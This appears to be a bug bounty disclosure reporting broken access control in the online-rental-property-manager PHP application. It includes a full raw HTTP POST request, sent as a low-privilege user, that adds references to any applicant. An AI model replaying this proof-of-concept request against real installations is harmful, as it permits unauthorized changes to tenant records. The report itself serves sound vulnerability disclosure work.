Execution with Unnecessary Privileges in bigprof-software/online-rental-property-manager
Reported on
Jul 3rd 2021
💥 BUG
privilege escalation bug to add references to a applicant .
💥 IMPACT
unprivileged user can add references to a applicant
💥 STEP TO REPRODUCE
1. From admin account goto http://localhost/online-rental/app/admin/pageViewMembers.php and add new user called user-B .
Now revoke all acccess from Applicants and tenants module for user-B .
So, user-B cant view/edit/create/delete any applicant.
2. Now goto admin account and add a new applicant .Lets asume the applicant id is 1\
3. Now goto user-B account and sent bellow request to add references to above applicant.\
POST /online-rental/app/references_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------270949312310667808591165584603
Content-Length: 2092
Origin: http://localhost
Connection: close
Referer: http://localhost/online-rental/app/references_view.php?filterer_tenant=1&addNew_x=1&Embedded=1
Cookie: rental_property_manager=8qh2ouu3163e1bjr6f25i45c51; rental_property_manager_remember_me=admin%3B%3BgmQZpneqoh4A3C3H96ppYYrCSVqNqM%3B%3B6F5D9e1ZnoLmFtzl6hGNsDF4ABwrwt;
Upgrade-Insecure-Requests: 1
Account: test2
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="Embedded"
1
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="csrf_token"
a21d69a86030e40629ee0be7c5920f08
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="filterer_tenant"
1
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="current_view"
DV
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="SortField"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="SelectedID"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="SelectedField"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="SortDirection"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="FirstRecord"
1
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="NoDV"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="PrintDV"
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="DisplayRecords"
all
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="tenant"
1
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="reference_name"
by_user
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="phone"
by_user
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="insert_x"
1
-----------------------------270949312310667808591165584603
Content-Disposition: form-data; name="SearchString"
-----------------------------270949312310667808591165584603--
Here in this request change applicant id value to above applicant id and a new references will be added to above applicant .
So, user-B dont have any access in applicant module but can add references to any applicant .
Occurrences
